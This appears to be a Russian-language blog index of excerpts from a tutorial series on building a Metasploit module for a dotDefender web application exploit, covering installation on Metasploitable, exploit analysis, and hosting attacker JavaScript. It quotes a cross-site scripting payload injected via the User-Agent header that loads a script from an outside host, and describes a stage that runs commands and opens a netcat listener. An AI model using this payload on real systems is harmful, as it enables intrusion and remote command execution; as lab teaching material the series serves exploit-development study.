Окончательный эксплоит

Теперь мы можем видеть финальный эксплоит. Это все что необходимо для того чтобы перейти от PoC до полноценного Metasploit модуля, в несколько простых шагов. В дальнейшем мы будем расширять данный код, с следующих статьях, будем продвигаться вперед для того чтобы сделать свой Metasploit модуль лучше, за счет расширения целей, повышения надежности эксплоита и тд.

Итоговый эксплоит
Dante

Читать далее Окончательный эксплоит

JavaScript хостинг

В этой статье я добавлю слушателя и JavaScript для эксплоита. Изменения в эксплоите я выделил.

 

Содержание

1. Включение запроса URI

2. Содержание

3. Отправка ответа HTML

Добавление JavaScript слушателя эксплоиту
Dante

  Читать далее JavaScript хостинг

Создаем записи журнала

Уже два дня ничего не писал себе в блог, да и вот сегодня только к вечеру заставил себя только к вечеру. За что кстати извиняюсь перед читателями, которые все же присутствуют. Скажу честно, просто зацепился за игрушкой, о ней я писал позавчера. На следующей неделе, может быть напишу несколько детальней об этой онлайн игре.

 

В этом разделе я буду рассматривать отправку запросов GET к цели. Этот GET запрос будет содержать поле User-Agent с добавленным Javascript для подключения обратно к Metasploit. Изменения эксплоита выделены.

  Читать далее Создаем записи журнала

Создание скелета

В разделе создания скелета, мы рассмотрим скелет эксплоита и запустим создание нашего DotDefander из PoC. Начнем мы с некоторых специфических вещей в скелете которые необходимы для работы эксплоита. Нет необходимости описания до конца, поэтому мы не будем о нем сейчас беспокоится.

Спецификация в скелете эксплоита
Dante

  Читать далее Создание скелета

Анализируя эксплоит

Анализируя эксплоит DotDefender

 

Глядя на эксплоит поближе мы видим, что необходимо сделать для того чтобы предотвратить DotDefender PoC в полный эксплоит.

 

Для работы этой атаки сначала вы должны войти в DotDefender залогиниться в нем, а затем просто просмотреть лог администратора в журнале DotDefender что вы создали. Это может быть сделано с какими-либо блоками DotDefender при помощи межсайтового скриптинга либо SQL-иньекции, просто изменив поле User-Agent для внедрения своего сценария, подобным образом:

 

<script language=»JavaScript» src=»http://MySite.com/DotDefender.js»></script>

 

Таким образом, это означает, что мы имеем две различные вещи, которые должны произойти в эксплоите. Во-первых, вызвать запись журнала в DotDefender с вредоносным User-Agent. Во-вторых, размещение файла JavaScript, что позволит выполнять команды на сервере.

 

Особенности JavaScript

 

1 этап

Это первый этап атаки. Что этот этап делает, создает запрос AJAX POST на страницу index.cgi с параметрами для удаления сервера из списка. Потому как мы выполняем этот сценарий при помощи AJAX и мы можем отправить параметры принадлежащие POST к индексной странице. Данный пример открывает netcat прослушивающий порт 4444. Единственное что должно быть изменено это название site.com, чтобы соответствовать сайту защищенному от DotDefender. Читать далее Анализируя эксплоит

Установка Dot Defender

Подготовка окружающей среды нашего веб приложения

 

Во-первых, мы должны установить dotDefender в уязвимой виртуальной машине Metasploitable. Это может быть сделано путем ввода в командной строке wget со следующем адресом:

 

http://www.applicure.com/downloads/3.85/linux/dotDefender-3.8-5.Linux.i386.deb.bin.gz

 

Загружаем DotDefender через wget
Dante

 

Тогда мы должны разархивировать загруженный файл, используя gunzip, сделать его исполняемый при помощи команды chmod, а затем запустим файл с расширением .bin, для начала установки.

Читать далее Установка Dot Defender

Разработка эксплоитов веб приложений

Эксплоиты веб-приложений
Dante

 

В этом разделе Metasploit разговор будет идти о разработке веб приложений эксплоитов в Metasploit Framework. Веб приложение, которое мы будем использовать, называется dotDefender и в дальнейших статьях в этом разделе мы будем рассматривать разработку эксплоитов веб-приложений. Код который мы будем использовать в качестве основы для нашего эксплоита можно обнаружить на веб-сайте Exploit-DB: http://www.exploit-db.com/exploits/14310/